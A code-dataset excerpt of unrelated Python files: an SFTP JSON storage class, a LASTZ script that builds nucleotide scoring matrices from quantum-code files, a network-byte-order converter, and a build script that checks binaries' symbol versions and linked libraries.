        if policy == 'autoadd':
            # Accept unknown host keys automatically (convenient, less safe).
            ssh.set_missing_host_key_policy(AutoAddPolicy())
        password = password or getpass(
            'Password for %s@%s: ' % (self.username, self.host))
        ssh.connect(self.host, username=self.username, password=password)
        self.ssh = ssh
        self.sftp = ssh.open_sftp()
        if self.path.startswith('~'):
            # SFTP does not expand '~'; resolve against the remote $HOME.
            self.path = os.path.join(find_home(self.ssh), self.path[2:])
        # Touch the file so it exists before opening the r+ handle below.
        self.sftp.open(self.path, mode='a').close()
        self._handle = self.sftp.open(self.path, mode='r+')

    def read(self):
        # Seek to the end to learn the size; an empty file means "no data yet".
        self._handle.seek(0, 2)
        size = self._handle.tell()
        if not size:
            return None
        else:
            self._handle.seek(0)
            return json.loads(self._handle.read().decode('utf-8'))

    def write(self, data):
        self._handle.seek(0)
        serialized = json.dumps(data, **self.kwargs)
        self._handle.write(serialized)
        self._handle.flush()
        # Drop stale trailing bytes left over from a previously longer DB.
        self._handle.truncate(self._handle.tell())

    def close(self):
        self._handle.close()
        self.ssh.close()
        self.sftp.close()
ace073263d1f18f604e66ad546bf30682685fbb6 | 14,066 | py | Python | externalTools/lastz-distrib-1.03.54/tools/qcode_to_scores.py | ComparativeGenomicsToolkit/cPecan | af9c59789e997d7a38723e567cc4c62394679cdd | [
"MIT"
] | null | null | null | externalTools/lastz-distrib-1.03.54/tools/qcode_to_scores.py | ComparativeGenomicsToolkit/cPecan | af9c59789e997d7a38723e567cc4c62394679cdd | [
"MIT"
] | null | null | null | externalTools/lastz-distrib-1.03.54/tools/qcode_to_scores.py | ComparativeGenomicsToolkit/cPecan | af9c59789e997d7a38723e567cc4c62394679cdd | [
"MIT"
] | 1 | 2017-03-10T21:14:37.000Z | 2017-03-10T21:14:37.000Z | #!/usr/bin/env python3
"""
Convert quantum-code files to a LASTZ scores file
-------------------------------------------------
Given background probabilities, probabilities of each DNA substitution event,
and one (or two) quantum code files, we create a log-odds scoring matrix
suitable for LASTZ.
Typical command line:
qcode_to_scores --scaleto=100 \
A:.26585 C:.23415 G:.23415 T:.26585 \ <--- background probabilties
AA:.18204 AC:.01903 AG:.04510 AT:.01967 \
CA:.01903 CC:.15508 CG:.01495 CT:.04510 \ <--- substitution probabilties
GA:.04510 GC:.01495 GG:.15508 GT:.01903 \
TA:.01967 TC:.04510 TG:.01903 TT:.18204 \
--code.target=<codefile> --code.query=<codefile>
An equivalent command line that takes advantage of the usual symmetry:
qcode_to_scores --scaleto=100 \
--symmetric \
A:.26585 C:.23415 \ <--- background probabilties
AA:.18204 AC:.01903 AG:.04510 AT:.01967 \ <--- substitution probabilties
CC:.15508 CG:.01495 \
--code.target=<codefile> --code.query=<codefile>
Quantum code files look something like the one below. Each row represents a
quantum symbol. The first value is the code value, either a single ascii
character or a two character hex value. The remaining four values are the
probability of that symbol being A, C, G, or T. Lines beginning with a # are
comments, and anything other than five columns is an error.
# p(A) p(C) p(G) p(T)
01 0.125041 0.080147 0.100723 0.694088
02 0.111162 0.053299 0.025790 0.809749
03 0.065313 0.007030 0.004978 0.922679
...
:Author: Bob Harris (rsharris@bx.psu.edu)
"""
import sys
from math import log
def usage(s=None):
    """Exit the program, printing *s* (if any) followed by the usage text."""
    message = """
qcode_to_scores [options] > lastz_score_file
--scaleto=<max> scale scores to give desired max
--symmetric map probabilities symmetrically
--hoxd70 use HOXD70 (lastz default scores) for probabilities
--code.target=<codefile> specify the quantum code for rows (LASTZ target)
--code.query=<codefile> specify the quantum code for columns (LASTZ query)
--code=<codefile> specify the quantum code for both rows *and* columns
--creator=<string> set name of creator to write as a comment in output
--nocreator inhibit creator comment in output
<base>.target:<prob> set target background probability of a nucleotide
<base>.query:<prob> set query background probability of a nucleotide
<base>:<prob> set background probability of a nucleotide for *both*
target and query
<basepair>:<prob> set basepair substitution probability; first base is
for target, second for query
"""
    if s is None:
        sys.exit(message)
    sys.exit("%s\n%s" % (s, message))
# The four nucleotides and the sixteen ordered (target,query) pairs.
bases = ["A","C","G","T"]

basePairs = ["AA","AC","AG","AT",
             "CA","CC","CG","CT",
             "GA","GC","GG","GT",
             "TA","TC","TG","TT"]

# Equivalence classes used by --symmetric: every member of a group shares
# one probability (reverse-complement / strand symmetry).
baseSymmetries = [["A","T"],["C","G"]]
pairSymmetries = [["AA","TT"],["CC","GG"],["AT","TA"],["CG","GC"],
                  ["AC","CA","GT","TG"],["AG","GA","CT","TC"]]

# Background and substitution probabilities underlying LASTZ's default
# HOXD70 scores; only the symmetric representatives are listed.
hoxd70 = [("A", .26585),("C", .23415),
          ("AA",.18204),("AC",.01903),("AG",.04510),("AT",.01967),
          ("CC",.15508),("CG",.01495)]
def main():
    """Parse the command line, build the log-odds matrix, and print it."""

    ##########
    # parse the command line
    ##########

    rProb = {}                 # background probabilities, target (rows)
    cProb = {}                 # background probabilities, query (columns)
    rcProb = {}                # substitution probabilities, pairs
    scaleTo = None
    symmetric = False
    # NOTE(review): dnaQuery, symbols, rowsAreDNA and colsAreDNA are set
    # below but never read -- possibly vestigial options.
    dnaQuery = True
    symbols = []
    settings = []
    rowCodeName = None
    colCodeName = None
    creator = "qcode_to_scores"
    debug = []

    args = sys.argv[1:]
    while (len(args) > 0):
        arg = args.pop(0)
        val = None
        fields = arg.split("=",1)
        if (len(fields) == 2):
            arg = fields[0]
            val = fields[1]
            if (val == ""):
                usage("missing a value in %s=" % arg)
        if (arg == "--scaleto") and (val != None):
            try: scaleTo = int(val)
            except ValueError: scaleTo = float(val)
        elif (arg == "--symmetric") and (val == None):
            symmetric = True
        elif (arg == "--nodna") and (val == None):
            dnaQuery = False
        elif (arg == "--dnarows") and (val == None):
            rowsAreDNA = True
        elif (arg in ["--dnacols","--dnacolumns"]) and (val == None):
            colsAreDNA = True
        elif (arg in ["--hoxd70","--HOXD70"]) and (val == None):
            # Preload the HOXD70 probabilities; implies --symmetric.
            symmetric = True
            for (s,p) in hoxd70:
                assert (s not in rProb) and (s not in cProb), \
                       "duplicate DNA event: %s" % s
                rProb[s] = cProb[s] = p
        elif (arg in ["--code.row","--code.target"]) and (val != None):
            assert (rowCodeName == None), \
                   "can't have more than one row/target code"
            rowCodeName = val
        elif (arg in ["--code.column","--code.col","--code.query"]) and (val != None):
            assert (colCodeName == None), \
                   "can't have more than one column/target code"
            colCodeName = val
        elif (arg == "--code") and (val != None):
            assert (rowCodeName == None), \
                   "can't have more than one row/target code"
            assert (colCodeName == None), \
                   "can't have more than one column/target code"
            rowCodeName = colCodeName = val
        elif (arg == "--nocreator") and (val == None):
            creator = None
        elif (arg == "--creator") and (val != None):
            creator = val
        elif (arg == "--debug") and (val != None):
            debug.append(val)
        elif (arg == "--debug") and (val == None):
            debug.append("debug")
        elif (arg.startswith("--")) and (val != None):
            # Unknown --name=value options are echoed in the output header.
            settings += [(arg[2:],val)]
        elif (arg.startswith("--")):
            usage("unknown argument: %s" % arg)
        elif (val == None) and (":" in arg):
            # Bare probability assignment, e.g. "A:.26585" or "AC:.01903".
            (s,which,p) = dna_event(arg)
            if (which == "target"): w = "row"
            elif (which == "query"): w = "col"
            elif (which == "column"): w = "col"
            else: w = which
            assert (w in ["row","col",None]), \
                   "can't decipher \"%s\" (in %s)" % (which,arg)
            if (w == "row"):
                assert (s in bases), \
                       "can't specify %s for %s (in %s)" % (which,s,arg)
                assert (s not in rProb), \
                       "duplicate DNA event: %s.target" % s
                rProb[s] = p
            elif (w == "col"):
                assert (s in bases), \
                       "can't specify %s for %s (in %s)" % (which,s,arg)
                assert (s not in cProb), \
                       "duplicate DNA event: %s.query" % s
                cProb[s] = p
            elif (s in bases):
                assert (s not in rProb) and (s not in cProb), \
                       "duplicate DNA event: %s" % s
                rProb[s] = cProb[s] = p
            else:
                assert (s not in rcProb), \
                       "duplicate DNA pair event: %s" % s
                rcProb[s] = p
        else:
            usage("unknown argument: %s" % arg)

    ##########
    # sanity check
    ##########

    if (symmetric):
        # Merge target/query backgrounds into one consensus distribution.
        conProb = {}
        for nuc in bases:
            if (nuc in rProb) and (nuc not in cProb):
                conProb[nuc] = rProb[nuc]
            elif (nuc in cProb) and (nuc not in rProb):
                conProb[nuc] = cProb[nuc]
            elif (nuc in cProb) and (nuc in rProb):
                assert (rProb[nuc] == cProb[nuc]), \
                       "can't use --symmetric with %s.target != %s.query" \
                     % (nuc,nuc)
                conProb[nuc] = rProb[nuc]
        # Propagate each group's single probability to all its members.
        for group in baseSymmetries:
            present = len([x for x in group if (x in conProb)])
            assert (present == 1), \
                   "need a probability for exactly one of %s" \
                 % (",".join(group))
            val = None
            for x in group:
                if (x in conProb):
                    val = conProb[x]
                    break
            for x in group:
                if (x not in conProb): conProb[x] = val
        rProb = cProb = conProb
        for group in pairSymmetries:
            present = len([x for x in group if (x in rcProb)])
            assert (present == 1), \
                   "need a probability for exactly one of %s" \
                 % (",".join(group))
            val = None
            for x in group:
                if (x in rcProb):
                    val = rcProb[x]
                    break
            for x in group:
                if (x not in rcProb): rcProb[x] = val

    for nuc in bases:
        assert (nuc in rProb), \
               "need a target probability for %s" % nuc
        assert (nuc in cProb), \
               "need a query probability for %s" % nuc
    for xy in basePairs:
        assert (xy in rcProb), \
               "need a probability for %s" % (xy)

    # Each distribution must sum to 1 (within tolerance).
    p = sum([rProb[nuc] for nuc in bases])
    assert (abs(p-1) < .00001), \
           "target base probabilities sum to %f" % p
    p = sum([cProb[nuc] for nuc in bases])
    assert (abs(p-1) < .00001), \
           "query base probabilities sum to %f" % p
    p = sum([rcProb[yx] for yx in basePairs])
    assert (abs(p-1) < .00001), \
           "base pair probabilities sum to %f" % p

    ##########
    # read code files
    ##########

    # read row code

    if (rowCodeName == None):
        rowCode = simple_dna_quantum_code()
    else:
        rowCode = read_quantum_code(rowCodeName)

    if (".order" in rowCode):
        rowSymbols = rowCode[".order"]
    else:
        rowSymbols = [sym for sym in rowCode]
        rowSymbols.sort()

    # read column code

    if (colCodeName == None):
        colCode = simple_dna_quantum_code()
    elif (colCodeName == rowCodeName):
        colCode = rowCode
    else:
        colCode = read_quantum_code(colCodeName)

    if (".order" in colCode):
        colSymbols = colCode[".order"]
    else:
        colSymbols = [sym for sym in colCode]
        colSymbols.sort()

    ##########
    # print what we got
    ##########

    if ("debug" in debug):
        print("target" \
            + " ".join([" %s:%.5f" % (nuc,rProb[nuc]) for nuc in bases]))
        print("query" \
            + " ".join([" %s:%.5f" % (nuc,cProb[nuc]) for nuc in bases]))
        for y in bases:
            print(" ".join(["%s:%.5f" % (y+x,rcProb[y+x]) for x in bases]))

    ##########
    # assign scores
    ##########

    # Log-odds score: log of p(pair) over the product of the backgrounds,
    # with the quantum symbols' profiles marginalizing over A/C/G/T.
    sub = {}
    maxSub = None
    for row in rowSymbols:
        u = rowCode[row]
        sub[row] = {}
        for col in colSymbols:
            v = colCode[col]
            numer = sum([u[y]*v[x]*rcProb[y+x] for (y,x) in basePairs])
            denom = sum([u[y]*v[x]*rProb[y]*cProb[x] for (y,x) in basePairs])
            sub[row][col] = log (float(numer) / float(denom))
            if (maxSub == None) or (sub[row][col] > maxSub):
                maxSub = sub[row][col]

    if (scaleTo != None):
        # Scale so the maximum score equals scaleTo; round to integers
        # when an integer scale was requested.
        scale = scaleTo / maxSub
        for row in rowSymbols:
            for col in colSymbols:
                sub[row][col] *= scale
                if (type(scaleTo) == int):
                    sub[row][col] = round(sub[row][col])

    ##########
    # print the settings, if there are any
    ##########

    if (creator != None):
        print("# created by %s" % creator)
        print()

    if (settings != []):
        sLen = max([len(s) for (s,val) in settings])
        for (s,val) in settings:
            print("%-*s = %s" % (sLen,s,val))
        print()

    ##########
    # print the substitution matrix
    ##########

    wRow = max([len(row) for row in rowSymbols])

    if (scaleTo != None) and (type(scaleTo) == int):
        # Integer formatting.
        wCol = 4
        for row in rowSymbols:
            for col in colSymbols:
                wCol = max(wCol,len("%d" % sub[row][col]))
        print("%-*s %s" \
            % (wRow," "," ".join(["%*s" % (wCol,col) for col in colSymbols])))
        for row in rowSymbols:
            print("%-*s %s" \
                % (wRow,row,
                   " ".join(["%*d" % (wCol,sub[row][col]) for col in colSymbols])))
    else:
        # Floating point formatting.
        wCol = 4
        for row in rowSymbols:
            for col in colSymbols:
                wCol = max(wCol,len("%.6f" % sub[row][col]))
        print("%-*s %s" \
            % (wRow," "," ".join(["%*s" % (wCol,col) for col in colSymbols])))
        for row in rowSymbols:
            print("%-*s %s" \
                % (wRow,row,
                   " ".join(["%*.6f" % (wCol,sub[row][col]) for col in colSymbols])))
def simple_dna_quantum_code():
    """Identity code: each nucleotide maps to itself with probability 1."""
    return {nuc1: {nuc2: (1 if nuc2 == nuc1 else 0) for nuc2 in bases}
            for nuc1 in bases}
def read_quantum_code(codeName):
    """Parse a quantum code file into {symbol: {base: probability}}.

    Each non-comment line holds a symbol (one printable character or a
    two-digit hex value) followed by four probabilities, for A, C, G and
    T respectively. The returned dict also records the symbols' file
    order under the special key ".order".
    """
    # bug fix: the py2 builtin file() does not exist under the python3
    # shebang this script declares; use open() instead.
    codeF = open(codeName, "rt")

    symToProfile = {}
    codeNumUsed = {}
    symOrder = []

    lineNum = 0
    for line in codeF:
        lineNum += 1
        line = line.strip()
        if ("#" in line):
            line = line.split("#",1)[0].strip()
        if (line == ""):
            continue

        fields = line.split()
        assert (len(fields) >= 5), \
               "fewer than four probabilities (%s line %d)" \
             % (codeName,lineNum)
        assert (len(fields) <= 5), \
               "more than four probabilities (%s line %d)" \
             % (codeName,lineNum)

        try:
            sym = fields[0]
            codeNum = quantum_code_num(sym)
        except ValueError:
            assert (False), \
                   "%s is not a valid quantum symbol (%s line %d)" \
                 % (sym,codeName,lineNum)

        if (codeNum in codeNumUsed):
            assert (False), \
                   "%s (or equivalent) appears more than once (%s line %d)" \
                 % (sym,codeName,lineNum)

        try:
            profile = {}
            for ix in range(4):
                p = float_or_fraction(fields[ix+1])
                if (not (0 <= p <= 1)): raise ValueError
                profile[bases[ix]] = p
        except:
            assert (False), \
                   "%s is a bad probability value (%s line %d)" \
                 % (fields[ix+1],codeName,lineNum)

        symToProfile[sym] = profile
        codeNumUsed[codeNum] = True
        symOrder += [sym]

    codeF.close ()

    # sanity check: at least one symbol, each profile sums to 1

    assert (len(symToProfile) >= 1), \
           "%s contains no code vectors!" % codeName

    for sym in symToProfile:
        p = sum([symToProfile[sym][nuc] for nuc in bases])
        assert (abs(p-1) < .00001), \
               "probabilities for %s sum to %f (in %s)" % (sym,p,codeName)

    symToProfile[".order"] = symOrder
    return symToProfile
def dna_event(s):
    """Parse "<event>[.<which>]:<prob>" into (event, which, probability).

    *event* is a nucleotide or nucleotide pair; *which* (optional) names
    the side it applies to (e.g. "target" or "query") and is None when
    absent; the probability may be a decimal or an "n/d" fraction.
    """
    (s,p) = s.split(":",1)
    if ("." in s): (s,which) = s.split(".",1)
    else:          which = None
    assert (valid_dna_event(s)), "invalid DNA event: %s" % s
    try:
        p = float_or_fraction(p)
        if (not (0 <= p <= 1)): raise ValueError
    except ValueError:
        assert (False), "invalid probability for %s: %s" % (s,p)
    return (s,which,p)
def valid_dna_event(s):
    """True iff *s* is a single nucleotide or a nucleotide pair."""
    if len(s) not in (1, 2):
        return False
    return all(ch in bases for ch in s)
def float_or_fraction(s):
    """Parse a decimal number or an "n/d" fraction string into a float."""
    if "/" not in s:
        return float(s)
    numer, denom = s.split("/", 1)
    return float(numer) / float(denom)
def quantum_code_num(s):
	"""Map a symbol to its canonical code number.

	A single printable ASCII character maps to its ordinal; a two-character
	string is read as hex (the value "00" is reserved).  Anything else
	raises ValueError.
	"""
	if len(s) == 1:
		code = ord(s)
		if 0x21 <= code <= 0x7E:
			return code
	elif len(s) == 2 and s != "00":
		try:
			return int(s, 16)
		except:
			raise ValueError
	raise ValueError
if __name__ == "__main__": main()
| 28.24498 | 80 | 0.565904 |
ace07419ca87c7d4673637ef5944438abd6c7018 | 3,345 | py | Python | udp-py/udp/ba/convert.py | moky/WormHole | 6b2b79274274f6764e0d519d384eb65489f4ca56 | [
"MIT"
] | 5 | 2020-05-24T03:35:00.000Z | 2021-06-05T00:27:54.000Z | udp-py/udp/ba/convert.py | moky/WormHole | 6b2b79274274f6764e0d519d384eb65489f4ca56 | [
"MIT"
] | null | null | null | udp-py/udp/ba/convert.py | moky/WormHole | 6b2b79274274f6764e0d519d384eb65489f4ca56 | [
"MIT"
] | 2 | 2020-09-11T05:29:11.000Z | 2022-03-13T15:45:22.000Z | # -*- coding: utf-8 -*-
#
# BA: Byte Array
#
# Written in 2020 by Moky <albert.moky@gmail.com>
#
# ==============================================================================
# MIT License
#
# Copyright (c) 2020 Albert Moky
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ==============================================================================
from typing import Optional, Union
from .array import ByteArray, IntegerData, Endian
from .integer import UInt16Data, UInt32Data
class Convert:
    """
    Network Byte Order Converter
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Thin convenience wrappers that pin the byte order to big-endian
    (network order) for the integer helpers in this package.
    """
    @classmethod
    def int_from_data(cls, data: Union[bytes, bytearray, ByteArray], start: int, size: int) -> int:
        # Read an unsigned big-endian integer of `size` bytes at offset `start`.
        return IntegerData.get_value(source=data, start=start, size=size, endian=Endian.BIG_ENDIAN)
    @classmethod
    def int16_from_data(cls, data: Union[bytes, bytearray, ByteArray], start: int = 0) -> int:
        # 16-bit (2-byte) big-endian integer.
        return cls.int_from_data(data=data, start=start, size=2)
    @classmethod
    def int32_from_data(cls, data: Union[bytes, bytearray, ByteArray], start: int = 0) -> int:
        # 32-bit (4-byte) big-endian integer.
        return cls.int_from_data(data=data, start=start, size=4)
    #
    #   UInt16Data
    #
    @classmethod
    def uint16data_from_value(cls, value: int) -> UInt16Data:
        # Wrap an int as big-endian UInt16Data.
        return UInt16Data.from_int(value=value, endian=Endian.BIG_ENDIAN)
    @classmethod
    def uint16data_from_data(cls, data: Union[bytes, bytearray, ByteArray], start: int = 0) -> Optional[UInt16Data]:
        # Parse UInt16Data starting at `start`; per the Optional return type,
        # presumably None when the remaining data is too short — see from_data.
        data = cut(data=data, start=start)
        return UInt16Data.from_data(data=data, endian=Endian.BIG_ENDIAN)
    #
    #   UInt32Data
    #
    @classmethod
    def uint32data_from_value(cls, value: int) -> UInt32Data:
        # Wrap an int as big-endian UInt32Data.
        return UInt32Data.from_int(value=value, endian=Endian.BIG_ENDIAN)
    @classmethod
    def uint32data_from_data(cls, data: Union[bytes, bytearray, ByteArray], start: int = 0) -> Optional[UInt32Data]:
        # Parse UInt32Data starting at `start`; see note on uint16data_from_data.
        data = cut(data=data, start=start)
        return UInt32Data.from_data(data=data, endian=Endian.BIG_ENDIAN)
def cut(data: Union[bytes, bytearray, ByteArray], start: int = 0) -> Union[bytes, bytearray, ByteArray]:
if start == 0:
return data
elif isinstance(data, ByteArray):
return data.slice(start=start)
else:
return data[start:]
| 37.58427 | 116 | 0.663677 |
ace074c8911b8a5f1ea42fe4351a4c7b752bba8a | 10,803 | py | Python | contrib/devtools/symbol-check.py | Saurabgami977/Matilda | 03372a57ca5d18228a48b6ec221fd2323ca58ceb | [
"MIT"
] | 1 | 2021-05-27T03:43:08.000Z | 2021-05-27T03:43:08.000Z | contrib/devtools/symbol-check.py | Saurabgami977/Matilda | 03372a57ca5d18228a48b6ec221fd2323ca58ceb | [
"MIT"
] | null | null | null | contrib/devtools/symbol-check.py | Saurabgami977/Matilda | 03372a57ca5d18228a48b6ec221fd2323ca58ceb | [
"MIT"
] | 1 | 2021-08-06T05:18:10.000Z | 2021-08-06T05:18:10.000Z | #!/usr/bin/env python3
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
A script to check that the executables produced by gitian only contain
certain symbols and are only linked against allowed libraries.
Example usage:
find ../gitian-builder/build -type f -executable | xargs python3 contrib/devtools/symbol-check.py
'''
import subprocess
import re
import sys
import os
from typing import List, Optional, Tuple
# Debian 8 (Jessie) EOL: 2020. https://wiki.debian.org/DebianReleases#Production_Releases
#
# - g++ version 4.9.2 (https://packages.debian.org/search?suite=jessie&arch=any&searchon=names&keywords=g%2B%2B)
# - libc version 2.19 (https://packages.debian.org/search?suite=jessie&arch=any&searchon=names&keywords=libc6)
#
# Ubuntu 16.04 (Xenial) EOL: 2024. https://wiki.ubuntu.com/Releases
#
# - g++ version 5.3.1 (https://packages.ubuntu.com/search?keywords=g%2B%2B&searchon=names&suite=xenial§ion=all)
# - libc version 2.23.0 (https://packages.ubuntu.com/search?keywords=libc6&searchon=names&suite=xenial§ion=all)
#
# CentOS 7 EOL: 2024. https://wiki.centos.org/FAQ/General
#
# - g++ version 4.8.5 (http://mirror.centos.org/centos/7/os/x86_64/Packages/)
# - libc version 2.17 (http://mirror.centos.org/centos/7/os/x86_64/Packages/)
#
# Taking the minimum of these as our target.
#
# According to GNU ABI document (https://gcc.gnu.org/onlinedocs/libstdc++/manual/abi.html) this corresponds to:
# GCC 4.8.5: GCC_4.8.0
# (glibc) GLIBC_2_17
#
# Newest symbol versions the produced binaries may reference (see the
# distro-support rationale in the comment block above).
MAX_VERSIONS = {
'GCC': (4,8,0),
'GLIBC': (2,17),
'LIBATOMIC': (1,0)
}
# See here for a description of _IO_stdin_used:
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=634261#109
# Ignore symbols that are exported as part of every executable
IGNORE_EXPORTS = {
'_edata', '_end', '__end__', '_init', '__bss_start', '__bss_start__', '_bss_end__', '__bss_end__', '_fini', '_IO_stdin_used', 'stdin', 'stdout', 'stderr',
'environ', '_environ', '__environ',
}
# Toolchain binaries; overridable via environment variables.
READELF_CMD = os.getenv('READELF', '/usr/bin/readelf')
CPPFILT_CMD = os.getenv('CPPFILT', '/usr/bin/c++filt')
OBJDUMP_CMD = os.getenv('OBJDUMP', '/usr/bin/objdump')
OTOOL_CMD = os.getenv('OTOOL', '/usr/bin/otool')
# Allowed NEEDED libraries
ELF_ALLOWED_LIBRARIES = {
# matildad and matilda-qt
'libgcc_s.so.1', # GCC base support
'libc.so.6', # C library
'libpthread.so.0', # threading
'libm.so.6', # math library
'librt.so.1', # real-time (clock)
'libatomic.so.1',
'ld-linux-x86-64.so.2', # 64-bit dynamic linker
'ld-linux.so.2', # 32-bit dynamic linker
'ld-linux-aarch64.so.1', # 64-bit ARM dynamic linker
'ld-linux-armhf.so.3', # 32-bit ARM dynamic linker
'ld-linux-riscv64-lp64d.so.1', # 64-bit RISC-V dynamic linker
# matilda-qt only
'libxcb.so.1', # part of X11
'libfontconfig.so.1', # font support
'libfreetype.so.6', # font parsing
'libdl.so.2' # programming interface to dynamic linker
}
# Minimum GLIBC a given architecture ever shipped with; versions at or
# below this floor are always accepted in check_version().
ARCH_MIN_GLIBC_VER = {
'80386': (2,1),
'X86-64': (2,2,5),
'ARM': (2,4),
'AArch64':(2,17),
'RISC-V': (2,27)
}
MACHO_ALLOWED_LIBRARIES = {
# matildad and matilda-qt
'libc++.1.dylib', # C++ Standard Library
'libSystem.B.dylib', # libc, libm, libpthread, libinfo
# matilda-qt only
'AppKit', # user interface
'ApplicationServices', # common application tasks.
'Carbon', # deprecated c back-compat API
'CoreFoundation', # low level func, data types
'CoreGraphics', # 2D rendering
'CoreServices', # operating system services
'CoreText', # interface for laying out text and handling fonts.
'Foundation', # base layer functionality for apps/frameworks
'ImageIO', # read and write image file formats.
'IOKit', # user-space access to hardware devices and drivers.
'libobjc.A.dylib', # Objective-C runtime library
}
PE_ALLOWED_LIBRARIES = {
'ADVAPI32.dll', # security & registry
'IPHLPAPI.DLL', # IP helper API
'KERNEL32.dll', # win32 base APIs
'msvcrt.dll', # C standard library for MSVC
'SHELL32.dll', # shell API
'USER32.dll', # user interface
'WS2_32.dll', # sockets
# matilda-qt only
'dwmapi.dll', # desktop window manager
'GDI32.dll', # graphics device interface
'IMM32.dll', # input method editor
'ole32.dll', # component object model
'OLEAUT32.dll', # OLE Automation API
'SHLWAPI.dll', # light weight shell API
'UxTheme.dll',
'VERSION.dll', # version checking
'WINMM.dll', # WinMM audio API
}
class CPPFilt(object):
    '''
    Demangle C++ symbol names.
    Use a pipe to the 'c++filt' command.
    '''
    def __init__(self):
        # One long-lived c++filt process; each __call__ round-trips a single
        # mangled name through its stdin/stdout pipe.
        self.proc = subprocess.Popen(CPPFILT_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE, universal_newlines=True)
    def __call__(self, mangled):
        # c++filt answers one line per input line; flush to avoid deadlock.
        self.proc.stdin.write(mangled + '\n')
        self.proc.stdin.flush()
        return self.proc.stdout.readline().rstrip()
    def close(self):
        # Shut down the pipes and reap the child process.
        self.proc.stdin.close()
        self.proc.stdout.close()
        self.proc.wait()
def read_symbols(executable, imports=True) -> List[Tuple[str, str, str]]:
    '''
    Parse an ELF executable and return a list of (symbol, version, arch)
    tuples for dynamic symbols: imported ones when imports=True, exported
    ones when imports=False.  Raises IOError when readelf fails.
    '''
    p = subprocess.Popen([READELF_CMD, '--dyn-syms', '-W', '-h', executable], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, universal_newlines=True)
    (stdout, stderr) = p.communicate()
    if p.returncode:
        raise IOError('Could not read symbols for {}: {}'.format(executable, stderr.strip()))
    syms = []
    for line in stdout.splitlines():
        line = line.split()
        # '-h' header output: remember the machine architecture for the
        # per-arch GLIBC floor in check_version().
        # NOTE(review): relies on readelf printing the header before any
        # symbol rows; otherwise `arch` would be unbound below.
        if 'Machine:' in line:
            arch = line[-1]
        # Symbol-table rows start with an 'N:' index token.
        if len(line)>7 and re.match('[0-9]+:$', line[0]):
            (sym, _, version) = line[7].partition('@')
            is_import = line[6] == 'UND'   # undefined here == imported
            if version.startswith('@'):
                version = version[1:]      # 'sym@@VER' default-version form
            if is_import == imports:
                syms.append((sym, version, arch))
    return syms
def check_version(max_versions, version, arch) -> bool:
    """Return True when `version` ('LIB_x.y.z') is at or below the allowed
    maximum for that library, with a per-architecture floor for GLIBC."""
    if '_' in version:
        lib, _, ver = version.rpartition('_')
    else:
        lib, ver = version, '0'
    parsed = tuple(int(part) for part in ver.split('.'))
    if lib not in max_versions:
        return False
    if parsed <= max_versions[lib]:
        return True
    return lib == 'GLIBC' and parsed <= ARCH_MIN_GLIBC_VER[arch]
def elf_read_libraries(filename) -> List[str]:
    """Return the DT_NEEDED shared-library names from an ELF's dynamic section."""
    proc = subprocess.Popen([READELF_CMD, '-d', '-W', filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, universal_newlines=True)
    stdout, stderr = proc.communicate()
    if proc.returncode:
        raise IOError('Error opening file')
    needed = []
    for line in stdout.splitlines():
        tokens = line.split()
        if len(tokens) <= 2 or tokens[1] != '(NEEDED)':
            continue
        match = re.match(r'^Shared library: \[(.*)\]$', ' '.join(tokens[2:]))
        if not match:
            raise ValueError('Unparseable (NEEDED) specification')
        needed.append(match.group(1))
    return needed
def check_imported_symbols(filename) -> bool:
    """Report any imported symbol whose version exceeds the allowed maxima;
    True when the binary is clean."""
    demangle = CPPFilt()
    passed = True
    for sym, version, arch in read_symbols(filename, True):
        if not version:
            continue
        if check_version(MAX_VERSIONS, version, arch):
            continue
        print('{}: symbol {} from unsupported version {}'.format(filename, demangle(sym), version))
        passed = False
    return passed
def check_exported_symbols(filename) -> bool:
    """Fail when the binary exports anything beyond IGNORE_EXPORTS
    (RISC-V binaries are exempt); True when clean."""
    demangle = CPPFilt()
    passed = True
    for sym, version, arch in read_symbols(filename, False):
        exempt = (arch == 'RISC-V') or (sym in IGNORE_EXPORTS)
        if not exempt:
            print('{}: export of symbol {} not allowed'.format(filename, demangle(sym)))
            passed = False
    return passed
def check_ELF_libraries(filename) -> bool:
    """True when every NEEDED library is on the ELF allow-list."""
    unexpected = [lib for lib in elf_read_libraries(filename)
                  if lib not in ELF_ALLOWED_LIBRARIES]
    for lib in unexpected:
        print('{}: NEEDED library {} is not allowed'.format(filename, lib))
    return not unexpected
def macho_read_libraries(filename) -> List[str]:
    """List the dylib/framework names a Mach-O binary links against (otool -L)."""
    proc = subprocess.Popen([OTOOL_CMD, '-L', filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, universal_newlines=True)
    stdout, stderr = proc.communicate()
    if proc.returncode:
        raise IOError('Error opening file')
    libraries = []
    for line in stdout.splitlines():
        tokens = line.split()
        # A single-token line is the executable's own name; everything else
        # starts with the library path — keep only its basename.
        if len(tokens) != 1:
            libraries.append(tokens[0].split('/')[-1])
    return libraries
def check_MACHO_libraries(filename) -> bool:
    """True when every linked dylib/framework is on the Mach-O allow-list."""
    offending = [dylib for dylib in macho_read_libraries(filename)
                 if dylib not in MACHO_ALLOWED_LIBRARIES]
    for dylib in offending:
